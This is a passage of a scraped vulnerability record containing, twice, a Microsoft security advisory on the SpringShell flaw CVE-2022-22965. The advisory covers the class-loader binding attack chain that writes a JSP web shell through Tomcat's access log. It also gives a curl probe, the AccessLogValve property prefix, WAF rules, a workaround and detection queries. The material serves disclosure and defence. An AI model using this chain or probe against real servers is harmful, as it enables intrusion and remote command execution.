running the Spring Core framework. Other vulnerabilities disclosed in the same component are less critical and not tracked as part of this blog.\n\nImpacted systems have the following traits:\n\n * Running JDK 9.0 or later\n * Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and earlier versions\n * Apache Tomcat as the Servlet container:\n * Packaged as a traditional Java web archive (WAR) and deployed in a standalone Tomcat instance; typical Spring Boot deployments using an embedded Servlet container or reactive web server are not impacted\n * Tomcat has _spring-webmvc_ or _spring-webflux_ dependencies\n\nAny system using JDK 9.0 or later and using the Spring Framework or derivative frameworks should be considered vulnerable. The following nonmalicious command can be used to determine vulnerable systems:\n \n \n $ curl host:port/path?class.module.classLoader.URLs%5B0%5D=0\n\nA host that returns an HTTP 400 response should be considered vulnerable to the attack detailed in the proof of concept (POC) below. Note that while this test is a good indicator of a system\u2019s susceptibility to an attack, any system within the scope of impacted systems listed above should still be considered vulnerable.\n\nThe [](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>)[threat and vulnerability management](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-tvm>) console within [Microsoft 365 Defender](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>) provides detection and reporting for this vulnerability.\n\nThis blog covers the following topics:\n\n 1. Observed activity\n 2. Attack breakdown\n 3. The vulnerability and exploit in depth\n * Background\n * Request mapping and request parameter binding\n * The process of property binding\n * The vulnerability and its exploitation\n * Prelude: CVE-2010-1622\n * The current exploit: CVE-2022-22965\n * From ClassLoader to AccessLogValve\n 4. Discovery and mitigations\n * How to find vulnerable devices\n * Enhanced protection with Azure Firewall Premium\n * Detect and protect with Azure Web Application Firewall (Azure WAF)\n * Global WAF with Azure Front Door\n * Regional WAF with Azure Application Gateway\n * Patch information and workarounds\n 5. Detections\n * Microsoft 365 Defender\n * Endpoint detection and response (EDR)\n * Antivirus\n * Hunting\n * Microsoft 365 Defender advanced hunting queries \n * Microsoft Sentinel\n\n## Observed activity\n\nMicrosoft regularly monitors attacks against our cloud infrastructure and services to defend them better. Since the Spring Core vulnerability was announced, we have been tracking a low volume of exploit attempts across our cloud services for Spring Cloud and Spring Core vulnerabilities. For CVE-2022-22965, the attempts closely align with the basic web shell POC described in this post.\n\nMicrosoft\u2019s continued monitoring of the threat landscape has not indicated a significant increase in quantity of attacks or new campaigns at this time.\n\n## Attack breakdown\n\nCVE-2022-22965 affects functions that use request mapping annotation and Plain Old Java Object (POJO) parameters within the Spring Framework. The POC code creates a controller that, when loaded into Tomcat, handles HTTP requests. \n\nThe only publicly available working POC is specific to Tomcat server&#x27;s logging properties via the _ClassLoader_ module in the _propertyDescriptor_ cache. The attacker can update the _AccessLogValve_ class using the module to create a web shell in the Tomcat root directory called _shell.jsp_. The attacker can then change the default access logs to a file of their choosing.\n\nFigure 1. Screenshot from the original POC code post\n\nThe changes to _AccessValveLog_ can be achieved by an attacker who can use HTTP requests to create a _.jsp_ file in the service\u2019s root directory. In the example below, each GET parameter is set as a Java object property. Each GET request then executes a Java code resembling the example below, wherein the final segment \u201csetPattern\u201d would be unique for each call (such as setPattern, setSuffix, setDirectory, and others): \n\n Figure 2. Screenshot from the original POC code post Figure 3. Screenshot from the original POC code post\n\nThe _.jsp_ file now contains a payload with a password-protected web shell with the following format:\n\n\n\nThe attacker can then use HTTP requests to execute commands. While the above POC depicts a command shell as the inserted code, this attack could be performed using any executable code.\n\n## The vulnerability and exploit in depth\n\nThe vulnerability in Spring results in a client&#x27;s ability, in some cases, to modify sensitive internal variables inside the web server or application by carefully crafting the HTTP request.\n\nIn the case of the Tomcat web server, the vulnerability allowed for that manipulation of the access log to be placed in an arbitrary path with somewhat arbitrary contents. The POC above sets the contents to be a JSP web shell and the path inside the Tomcat&#x27;s web application ROOT directory, which essentially drops a reverse shell inside Tomcat. For the web application to be vulnerable, it needs to use Spring\u2019s request mapping feature, with the handler function receiving a Java object as a parameter.\n\n### Background\n\n#### Request mapping and request parameter binding\n\nSpring allows developers to map HTTP requests to Java handler methods. The web application&#x27;s developer can ask Spring to call an appropriate handler method each time a user requests a specific URI. For instance, the following web application code will cause Spring to invoke the method _handleWeatherRequest_ each time a user requests the URI _/WeatherReport_:\n \n \n @RequestMapping(\"/WeatherReport\")\n public string handleWeatherRequest(Location reportLocation)\n {\n \u2026\n }\n\nMoreover, through request parameter binding, the handler method can accept arguments passed through parameters in GET/POST/REST requests. In the above example, Spring will instantiate a _Location_ object, initialize its fields according to the HTTP request\u2019s parameters, and pass it on to _handleWeatherRequest_. So, if, for instance, _Location_ will be defined as:\n \n \n class Location \n { \n public void setCountry(string country) {\u2026} \n public void setCity(string city) {\u2026} \n public string getCountry() {\u2026} \n public string getCity() {\u2026} \n }\n\nIf we issue the following HTTP request:\n \n \n example.com/WeatherReport?country=USA&city=Redmond\n\nThe resulting call to _handleWeatherRequest_ will automatically have a _reportLocation_ argument with the country set to USA and city set to Redmond. \n\nIf _Location_ had a sub-object named _coordinates_, which contained _longitude_ and _latitude_ parameters, then Spring would try and initialize them out of the parameters of an incoming request. For example, when receiving a request with GET params _coordinates.longitude=123&amp;coordinate.latitude=456_ Spring would try and set those values in the _coordinates_ member of _location_, before handing over control to _handleWeatherRequest_.\n\nThe SpringShell vulnerability directly relates to the process Spring uses to populate these fields.\n\n#### The process of property binding\n\nWhenever Spring receives an HTTP request mapped to a handler method as described above, it will try and bind the request\u2019s parameters for each argument in the handler method. Now, to stick with the previous example, a client asked for:\n \n \n example.com/WeatherReport?x.y.z=foo\n\nSpring would instantiate the argument (in our case, create a _Location_ object). Then it breaks up the parameter name by dots (.) and tries to do a series of steps:\n\n 1. Use Java introspection to map all accessors and mutators in _location_\n 2. If location has a getX_()_ accessor, call it to get the _x_ member of location\n 3. Use Java introspection to map all accessors and mutators in the_ x_ object\n 4. If the _x_ object has a _getY_() accessor, call it to get the _y_ object inside of the _x_ object\n 5. Use Java introspection to map all accessors and mutators in the_ y_ object\n 6. If the _y_ object has a _setZ()_ mutator, call it with parameter _\u201cfoo\u201d_\n\nSo essentially, ignoring the details, we get _location.getX().getY().setZ(\u201cfoo\u201d)_.\n\n### The vulnerability and its exploitation\n\n#### Prelude: CVE-2010-1622\n\nIn June 2010, a CVE was [published](<https://nvd.nist.gov/vuln/detail/CVE-2010-1622>) for the Spring framework. The crux of the CVE was as follows:\n\n 1. All Java objects implicitly contain a _getClass()_ accessor that returns the _Class_ describing the object&#x27;s class.\n 2. _Class_ objects have a _getClassLoader()_ accessor the gets the _ClassLoader_ object.\n 3. Tomcat uses its own class loader for its web applications. This class loader contains various members that can affect Tomcat\u2019s behavior. One such member is _URLs_, which is an array of URLs the class loader uses to retrieve resources.\n 4. Overwriting one of the URLs with a URL to a remote JAR file would cause Tomcat to subsequently load the JAR from an attacker-controlled location.\n\nThe bug was fixed in Spring by preventing the mapping of the _getClassLoader()_ or _getProtectionDomain()_ accessors of _Class_ objects during the property-binding phase. Hence _class.classLoader_ would not resolve, thwarting the attack.\n\n#### The current exploit: CVE-2022-22965\n\nThe current exploit leverages the same mechanism as in CVE-2010-1622, bypassing the previous bug fix. Java 9 added a new technology called Java Modules. An accessor was added to the _Class_ object, called _getModule()_. The _Module_ object contains a _getClassLoader()_ accessor. Since the CVE-2010-1622 fix only prevented mapping the _getClassLoader()_ accessor of _Class_ objects, Spring mapped the _getClassLoader()_ accessor of the _Module_ object. Once again, one could reference the class loader from Spring via the _class.module.classLoader_ parameter name prefix.\n\n#### From _ClassLoader_ to _AccessLogValve_\n\nThe latest exploit uses the same accessor chaining, via the Tomcat class loader, to drop a JSP web shell on the server.\n\nThis is done by manipulating the properties of the _AccessLogValve_ object in Tomcat\u2019s pipeline. The _AccessLogValve _is referenced using the _class.module.classLoader.resources.context.parent.pipeline.first_ parameter prefix.\n\nThe following properties are changed:\n\n 1. **Directory: **The path where to store the access log, relative to Tomcat\u2019s root directory. This can be manipulated to point into a location accessible by http requests, such as the web application\u2019s directory.\n 2. **Prefix: **The prefix of the access log file name\n 3. **Suffix: **The suffix of the access log file name. The log file name is a concatenation of the prefix with the suffix.\n 4. **Pattern: **A string that describes the log record structure. This can be manipulated so that each record will essentially contain a JSP web shell.\n 5. **FileDateFormat:** Setting this causes the new access log settings to take effect.\n\nOnce the web shell is dropped on the server, the attacker can execute commands on the server as Tomcat.\n\n## Discovery and mitigations\n\n### How to find vulnerable devices\n\n[Threat and vulnerability management](<https://www.microsoft.com/security/business/threat-protection/threat-vulnerability-management>) capabilities in [Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/threat-protection/endpoint-defender>) monitor an organization\u2019s overall security posture and equip customers with real-time insights into organizational risk through continuous vulnerability discovery, intelligent prioritization, and the ability to seamlessly remediate vulnerabilities. \n\nCustomers can now search for CVE-2022-22965 to find vulnerable devices through the [Weaknesses](<https://securitycenter.microsoft.com/vulnerabilities?search=CVE-2022-22965>) page in threat and vulnerability management.\n\nFigure 4. Weaknesses page in Microsoft Defender for Endpoint\n\n### Enhanced protection with Azure Firewall Premium\n\nCustomers using [Azure Firewall Premium](<https://docs.microsoft.com/azure/firewall/premium-migrate>) have enhanced protection from the SpringShell CVE-2022-22965 vulnerability and exploits. Azure Firewall Premium Intrusion Detection and Prevention System (IDPS) provides IDPS inspection for all east-west traffic, outbound traffic to the internet, and inbound HTTP traffic from the internet. The vulnerability rulesets are continuously updated and include vulnerability protection for SpringShell since March 31, 2022. The screenshot below shows all the scenarios which are actively mitigated by Azure Firewall Premium.\n\nConfigure Azure Firewall Premium with both IDPS Alert &amp; Deny mode and TLS inspection enabled for proactive protection against CVE-2022-22965 exploit. \n\nFigure 5. Azure Firewall Premium portal detecting CVE-2022-22965 exploitation attempts.\n\nCustomers using Azure Firewall Standard can migrate to Premium by following [these directions](<https://docs.microsoft.com/azure/firewall/premium-migrate>). Customers new to Azure Firewall Premium can learn more about [Firewall Premium](<https://docs.microsoft.com/azure/firewall/premium-features>).\n\n### Detect and protect with Azure Web Application Firewall (Azure WAF)\n\nAzure Web Application Firewall (WAF) customers with Azure Front Door and Azure Application Gateway deployments now have enhanced protection for the SpringShell exploit - [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and other high impact Spring vulnerabilities [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>) and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>). To help detect and mitigate these critical Spring vulnerabilities, we have released four new rules.\n\n#### Global WAF with Azure Front Door\n\nAzure WAF has updated Default Rule Set (DRS) versions 2.0/1.1/1.0.\n\n * Rule group: _MS-ThreatIntel-WebShells_, Rule Id: 99005006 - Spring4Shell Interaction Attempt\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001014 - Attempted Spring Cloud routing-expression injection (CVE-2022-22963)\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001015 - Attempted Spring Framework unsafe class object exploitation (CVE-2022-22965)\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001016 - Attempted Spring Cloud Gateway Actuator injection (CVE-2022-22947)\n\nWAF rules on Azure Front Door are disabled by default on existing Microsoft managed rule sets.\n\nFigure 6. Screenshot of WAF Spring vulnerabilities\n\n#### Regional WAF with Azure Application Gateway\n\nAzure WAF has updated OWASP Core Rule Set (CRS) versions for Azure Application Gateway WAF V2 regional deployments. New rules are under _Known_CVEs_ rule group:\n\n * Rule Id: 800110 - _Spring4Shell Interaction Attempt_\n * Rule Id: 800111 - _Attempted Spring Cloud routing-expression injection_ - CVE-2022-22963\n * Rule Id: 800112 - _Attempted Spring Framework unsafe class object exploitation_ - CVE-2022-22965\n * Rule Id: 800113 - _Attempted Spring Cloud Gateway Actuator injection_ - CVE-2022-22947\n\nWAF rules on Azure Application Gateway are _enabled_ by default for supported CRS versions.\n\nFigure 7. Spring vulnerability rules for Azure Application Gateway OWASP Core Rule Set (CRS)\n\n**Recommendation**: Enable WAF SpringShell rules to get protection from these threats. We will continue to monitor threat patterns and modify the above rules in response to emerging attack patterns as required. \n\nFor more information about Managed Rules and Default Rule Set (DRS) on Azure Front Door, see the [Web Application Firewall DRS rule groups and rules documentation](<https://docs.microsoft.com/azure/web-application-firewall/afds/waf-front-door-drs>). For more information about Managed Rules and OWASP Core Rule Set (CRS) on Azure Application Gateway, see the [Web Application Firewall CRS rule groups and rules documentation](<https://docs.microsoft.com/en-us/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rules?tabs=owasp32>)\n\n### Patch information and workarounds\n\nCustomers are encouraged to apply these mitigations to reduce the impact of this threat. Check the recommendations card in Microsoft 365 Defender threat and vulnerability management for the deployment status of monitored mitigations.\n\n * An [update](<https://spring.io/blog/2022/03/31/spring-boot-2-6-6-available-now>) is available for CVE-2022-22965. Administrators should upgrade to versions 5.3.18 or later or 5.2.19 or later. If the patch is applied, no other mitigation is necessary.\n\nIf you\u2019re unable to patch CVE-2022-22965, you can implement this set of workarounds published by [Spring](<https://www.springcloud.io/post/2022-03/spring-framework-rce-early-announcement/#gsc.tab=0>):\n\n * Search the @InitBinder annotation globally in the application to see if the dataBinder.setDisallowedFields method is called in the method body. If the introduction of this code snippet is found, add `{\"class.*\",\"Class.*\",\"*.class.*\", \"*.Class.*\"}` to the original blacklist. (**Note:** If this code snippet is used a lot, it needs to be appended in each location.)\n * Add the following global class into the package where the Controller is located. Then recompile and test the project for functionality:\n \n \n import org.springframework.core.annotation.Order;\n import org.springframework.web.bind.WebDataBinder;\n import org.springframework.web.bind.annotation.ControllerAdvice;\n import org.springframework.web.bind.annotation.InitBinder;\n @ControllerAdvice\n @Order(10000)\n public class GlobalControllerAdvice{\n @InitBinder\n public void setAllowedFields(webdataBinder dataBinder){\n String[]abd=new string[]{\"class.*\",\"Class.*\",\"*.class.*\",\"*.Class.*\"};\n dataBinder.setDisallowedFields(abd);\n }\n }\n\n## Detections\n\n### Microsoft 365 Defender\n\n#### Endpoint detection and response (EDR)\n\nAlerts with the following title in the security center can indicate threat activity on your network:\n\n * Possible SpringShell exploitation\n\nThe following alerts for an observed attack, but might not be unique to exploitation for this vulnerability:\n\n * Suspicious process executed by a network service\n\n#### Antivirus\n\nMicrosoft Defender antivirus version **1.361.1234.0** or later detects components and behaviors related to this threat with the following detections:\n\n * Trojan:Python/SpringShellExpl\n * Exploit:Python/SpringShell\n * Backdoor:PHP/Remoteshell.V\n\n### Hunting\n\n#### Microsoft 365 Defender advanced hunting queries \n\nUse the query below to surface exploitation of CVE-2022-22965 on both victim devices and devices performing the exploitation. Note that this query only covers HTTP use of the exploitation and not HTTPS.\n \n \n DeviceNetworkEvents\n | where Timestamp > ago(7d)\n | where ActionType =~ \"NetworkSignatureInspected\"\n | where AdditionalFields contains \".jsp?cmd=\"\n | summarize makeset(AdditionalFields, 5), min(Timestamp), max(Timestamp) by DeviceId, DeviceName \n\n#### Microsoft Sentinel\n\nMicrosoft Sentinel customers can use the following queries to look for this threat activity:\n\n * [Possible SpringShell exploitation attempt (CVE-2022-22965)](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting Queries/AzureDiagnostics/SpringShellExploitationAttempt.yaml>) \u2013 This hunting query looks in Azure Web Application Firewall data to find possible SpringShell exploitation attempt (CVE-2022-22965) to drop a malicious web shell in a location accessible by HTTP requests. Attackers then make requests to the malicious backdoor to run system commands.\n * [Possible web shell usage attempt related to SpringShell (CVE-2202-22965)](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting Queries/AzureDiagnostics/SpringshellWebshellUsage.yaml>) \u2013 This hunting query looks in Azure Web Application Firewall data to find possible web shell usage related to SpringShell RCE vulnerability (CVE-2022-22965).\n * [AV detections related to SpringShell Vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityAlert/AVSpringShell.yaml>) \u2013 This query looks for Microsoft Defender for Endpoint hits related to the SpringShell vulnerability. In Microsoft Sentinel, the _SecurityAlerts _table includes only the device name of the affected device. This query joins the _DeviceInfo _table to clearly connect other information such as device group, IP address, signed in users, and others. This allows the Microsoft Sentinel analyst to have more context related to the alert, if available.\n\n**Revision history**\n\n_[04/11/2022] \u2013 _Application Gateway now has enhanced protection for critical Spring vulnerabilities - [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>), [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>)._ _See _Detection and Mitigation section for details_.\n\n_[04/08/2022] \u2013 Azure Web Application Firewall (WAF) customers with Azure Front Door now has enhanced protection for Spring4Shell exploits - CVE-2022-22963, CVE-2022-22965, and CVE-2022-22947. See Detection and Mitigation section for details. \n[04/05/2022] \u2013 We added Microsoft Sentinel hunting queries to look for SpringShell exploitation activity._\n\nThe post [SpringShell RCE vulnerability: Guidance for protecting against and detecting CVE-2022-22965](<https://www.microsoft.com/security/blog/2022/04/04/springshell-rce-vulnerability-guidance-for-protecting-against-and-detecting-cve-2022-22965/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-05T01:11:24", "type": "mmpc", "title": "SpringShell RCE vulnerability: Guidance for protecting against and detecting CVE-2022-22965", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2022-22947", "CVE-2022-22963", "CVE-2022-22965", "CVE-2202-22965"], "modified": "2022-04-05T01:11:24", "id": "MMPC:07417E2EE012BAE0350B156AD2AE30B3", "href": "https://www.microsoft.com/security/blog/2022/04/04/springshell-rce-vulnerability-guidance-for-protecting-against-and-detecting-cve-2022-22965/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mssecure": [{"lastseen": "2022-04-11T23:40:23", "description": "**_April 11, 2022 update_** \u2013 __Azure Web Application Firewall (WAF) customers with Regional WAF with Azure Application Gateway now has enhanced protection for critical Spring vulnerabilities - [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>), [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>)._ _See [](<https://www.microsoft.com/security/blog/wp-admin/post.php?post=110715&action=edit#detectandprotect>)Detect and protect with Azure Web Application Firewall (Azure WAF) section for details__.\n\nOn March 31, 2022, vulnerabilities in the Spring Framework for Java were [publicly disclosed](<https://www.springcloud.io/post/2022-03/spring-framework-rce-early-announcement/#gsc.tab=0>). Microsoft is currently assessing the impact associated with these vulnerabilities. This blog is for customers looking for protection against exploitation and ways to detect vulnerable installations on their network of the critical remote code execution (RCE) vulnerability [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>) (also known as SpringShell or Spring4Shell).\n\nThe Spring Framework is the most widely used lightweight open-source framework for Java. In Java Development Kit (JDK) version 9.0 or later, a remote attacker can obtain an _AccessLogValve _object through the framework\u2019s parameter binding feature and use malicious field values to trigger the pipeline mechanism and write to a file in an arbitrary path, if certain conditions are met. \n\nThe vulnerability in Spring Core\u2014referred to in the security community as SpringShell or Spring4Shell\u2014can be exploited when an attacker sends a specially crafted query to a web server running the Spring Core framework. Other vulnerabilities disclosed in the same component are less critical and not tracked as part of this blog.\n\nImpacted systems have the following traits:\n\n * Running JDK 9.0 or later\n * Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and earlier versions\n * Apache Tomcat as the Servlet container:\n * Packaged as a traditional Java web archive (WAR) and deployed in a standalone Tomcat instance; typical Spring Boot deployments using an embedded Servlet container or reactive web server are not impacted\n * Tomcat has _spring-webmvc_ or _spring-webflux_ dependencies\n\nAny system using JDK 9.0 or later and using the Spring Framework or derivative frameworks should be considered vulnerable. The following nonmalicious command can be used to determine vulnerable systems:\n \n \n $ curl host:port/path?class.module.classLoader.URLs%5B0%5D=0\n\nA host that returns an HTTP 400 response should be considered vulnerable to the attack detailed in the proof of concept (POC) below. Note that while this test is a good indicator of a system\u2019s susceptibility to an attack, any system within the scope of impacted systems listed above should still be considered vulnerable.\n\nThe [](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>)[threat and vulnerability management](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-tvm>) console within [Microsoft 365 Defender](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>) provides detection and reporting for this vulnerability.\n\nThis blog covers the following topics:\n\n 1. Observed activity\n 2. Attack breakdown\n 3. The vulnerability and exploit in depth\n * Background\n * Request mapping and request parameter binding\n * The process of property binding\n * The vulnerability and its exploitation\n * Prelude: CVE-2010-1622\n * The current exploit: CVE-2022-22965\n * From ClassLoader to AccessLogValve\n 4. Discovery and mitigations\n * How to find vulnerable devices\n * Enhanced protection with Azure Firewall Premium\n * Detect and protect with Azure Web Application Firewall (Azure WAF)\n * Global WAF with Azure Front Door\n * Regional WAF with Azure Application Gateway\n * Patch information and workarounds\n 5. Detections\n * Microsoft 365 Defender\n * Endpoint detection and response (EDR)\n * Antivirus\n * Hunting\n * Microsoft 365 Defender advanced hunting queries \n * Microsoft Sentinel\n\n## Observed activity\n\nMicrosoft regularly monitors attacks against our cloud infrastructure and services to defend them better. Since the Spring Core vulnerability was announced, we have been tracking a low volume of exploit attempts across our cloud services for Spring Cloud and Spring Core vulnerabilities. For CVE-2022-22965, the attempts closely align with the basic web shell POC described in this post.\n\nMicrosoft\u2019s continued monitoring of the threat landscape has not indicated a significant increase in quantity of attacks or new campaigns at this time.\n\n## Attack breakdown\n\nCVE-2022-22965 affects functions that use request mapping annotation and Plain Old Java Object (POJO) parameters within the Spring Framework. The POC code creates a controller that, when loaded into Tomcat, handles HTTP requests. \n\nThe only publicly available working POC is specific to Tomcat server&#x27;s logging properties via the _ClassLoader_ module in the _propertyDescriptor_ cache. The attacker can update the _AccessLogValve_ class using the module to create a web shell in the Tomcat root directory called _shell.jsp_. The attacker can then change the default access logs to a file of their choosing.\n\nFigure 1. Screenshot from the original POC code post\n\nThe changes to _AccessValveLog_ can be achieved by an attacker who can use HTTP requests to create a _.jsp_ file in the service\u2019s root directory. In the example below, each GET parameter is set as a Java object property. Each GET request then executes a Java code resembling the example below, wherein the final segment \u201csetPattern\u201d would be unique for each call (such as setPattern, setSuffix, setDirectory, and others): \n\n Figure 2. Screenshot from the original POC code post Figure 3. Screenshot from the original POC code post\n\nThe _.jsp_ file now contains a payload with a password-protected web shell with the following format:\n\n\n\nThe attacker can then use HTTP requests to execute commands. While the above POC depicts a command shell as the inserted code, this attack could be performed using any executable code.\n\n## The vulnerability and exploit in depth\n\nThe vulnerability in Spring results in a client&#x27;s ability, in some cases, to modify sensitive internal variables inside the web server or application by carefully crafting the HTTP request.\n\nIn the case of the Tomcat web server, the vulnerability allowed for that manipulation of the access log to be placed in an arbitrary path with somewhat arbitrary contents. The POC above sets the contents to be a JSP web shell and the path inside the Tomcat&#x27;s web application ROOT directory, which essentially drops a reverse shell inside Tomcat. For the web application to be vulnerable, it needs to use Spring\u2019s request mapping feature, with the handler function receiving a Java object as a parameter.\n\n### Background\n\n#### Request mapping and request parameter binding\n\nSpring allows developers to map HTTP requests to Java handler methods. The web application&#x27;s developer can ask Spring to call an appropriate handler method each time a user requests a specific URI. For instance, the following web application code will cause Spring to invoke the method _handleWeatherRequest_ each time a user requests the URI _/WeatherReport_:\n \n \n @RequestMapping(\"/WeatherReport\")\n public string handleWeatherRequest(Location reportLocation)\n {\n \u2026\n }\n\nMoreover, through request parameter binding, the handler method can accept arguments passed through parameters in GET/POST/REST requests. In the above example, Spring will instantiate a _Location_ object, initialize its fields according to the HTTP request\u2019s parameters, and pass it on to _handleWeatherRequest_. So, if, for instance, _Location_ will be defined as:\n \n \n class Location \n { \n public void setCountry(string country) {\u2026} \n public void setCity(string city) {\u2026} \n public string getCountry() {\u2026} \n public string getCity() {\u2026} \n }\n\nIf we issue the following HTTP request:\n \n \n example.com/WeatherReport?country=USA&city=Redmond\n\nThe resulting call to _handleWeatherRequest_ will automatically have a _reportLocation_ argument with the country set to USA and city set to Redmond. \n\nIf _Location_ had a sub-object named _coordinates_, which contained _longitude_ and _latitude_ parameters, then Spring would try and initialize them out of the parameters of an incoming request. For example, when receiving a request with GET params _coordinates.longitude=123&amp;coordinate.latitude=456_ Spring would try and set those values in the _coordinates_ member of _location_, before handing over control to _handleWeatherRequest_.\n\nThe SpringShell vulnerability directly relates to the process Spring uses to populate these fields.\n\n#### The process of property binding\n\nWhenever Spring receives an HTTP request mapped to a handler method as described above, it will try and bind the request\u2019s parameters for each argument in the handler method. Now, to stick with the previous example, a client asked for:\n \n \n example.com/WeatherReport?x.y.z=foo\n\nSpring would instantiate the argument (in our case, create a _Location_ object). Then it breaks up the parameter name by dots (.) and tries to do a series of steps:\n\n 1. Use Java introspection to map all accessors and mutators in _location_\n 2. If location has a getX_()_ accessor, call it to get the _x_ member of location\n 3. Use Java introspection to map all accessors and mutators in the_ x_ object\n 4. If the _x_ object has a _getY_() accessor, call it to get the _y_ object inside of the _x_ object\n 5. Use Java introspection to map all accessors and mutators in the_ y_ object\n 6. If the _y_ object has a _setZ()_ mutator, call it with parameter _\u201cfoo\u201d_\n\nSo essentially, ignoring the details, we get _location.getX().getY().setZ(\u201cfoo\u201d)_.\n\n### The vulnerability and its exploitation\n\n#### Prelude: CVE-2010-1622\n\nIn June 2010, a CVE was [published](<https://nvd.nist.gov/vuln/detail/CVE-2010-1622>) for the Spring framework. The crux of the CVE was as follows:\n\n 1. All Java objects implicitly contain a _getClass()_ accessor that returns the _Class_ describing the object&#x27;s class.\n 2. _Class_ objects have a _getClassLoader()_ accessor the gets the _ClassLoader_ object.\n 3. Tomcat uses its own class loader for its web applications. This class loader contains various members that can affect Tomcat\u2019s behavior. One such member is _URLs_, which is an array of URLs the class loader uses to retrieve resources.\n 4. Overwriting one of the URLs with a URL to a remote JAR file would cause Tomcat to subsequently load the JAR from an attacker-controlled location.\n\nThe bug was fixed in Spring by preventing the mapping of the _getClassLoader()_ or _getProtectionDomain()_ accessors of _Class_ objects during the property-binding phase. Hence _class.classLoader_ would not resolve, thwarting the attack.\n\n#### The current exploit: CVE-2022-22965\n\nThe current exploit leverages the same mechanism as in CVE-2010-1622, bypassing the previous bug fix. Java 9 added a new technology called Java Modules. An accessor was added to the _Class_ object, called _getModule()_. The _Module_ object contains a _getClassLoader()_ accessor. Since the CVE-2010-1622 fix only prevented mapping the _getClassLoader()_ accessor of _Class_ objects, Spring mapped the _getClassLoader()_ accessor of the _Module_ object. Once again, one could reference the class loader from Spring via the _class.module.classLoader_ parameter name prefix.\n\n#### From _ClassLoader_ to _AccessLogValve_\n\nThe latest exploit uses the same accessor chaining, via the Tomcat class loader, to drop a JSP web shell on the server.\n\nThis is done by manipulating the properties of the _AccessLogValve_ object in Tomcat\u2019s pipeline. The _AccessLogValve _is referenced using the _class.module.classLoader.resources.context.parent.pipeline.first_ parameter prefix.\n\nThe following properties are changed:\n\n 1. **Directory: **The path where to store the access log, relative to Tomcat\u2019s root directory. This can be manipulated to point into a location accessible by http requests, such as the web application\u2019s directory.\n 2. **Prefix: **The prefix of the access log file name\n 3. **Suffix: **The suffix of the access log file name. The log file name is a concatenation of the prefix with the suffix.\n 4. **Pattern: **A string that describes the log record structure. This can be manipulated so that each record will essentially contain a JSP web shell.\n 5. **FileDateFormat:** Setting this causes the new access log settings to take effect.\n\nOnce the web shell is dropped on the server, the attacker can execute commands on the server as Tomcat.\n\n## Discovery and mitigations\n\n### How to find vulnerable devices\n\n[Threat and vulnerability management](<https://www.microsoft.com/security/business/threat-protection/threat-vulnerability-management>) capabilities in [Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/threat-protection/endpoint-defender>) monitor an organization\u2019s overall security posture and equip customers with real-time insights into organizational risk through continuous vulnerability discovery, intelligent prioritization, and the ability to seamlessly remediate vulnerabilities. \n\nCustomers can now search for CVE-2022-22965 to find vulnerable devices through the [Weaknesses](<https://securitycenter.microsoft.com/vulnerabilities?search=CVE-2022-22965>) page in threat and vulnerability management.\n\nFigure 4. Weaknesses page in Microsoft Defender for Endpoint\n\n### Enhanced protection with Azure Firewall Premium\n\nCustomers using [Azure Firewall Premium](<https://docs.microsoft.com/azure/firewall/premium-migrate>) have enhanced protection from the SpringShell CVE-2022-22965 vulnerability and exploits. Azure Firewall Premium Intrusion Detection and Prevention System (IDPS) provides IDPS inspection for all east-west traffic, outbound traffic to the internet, and inbound HTTP traffic from the internet. The vulnerability rulesets are continuously updated and include vulnerability protection for SpringShell since March 31, 2022. The 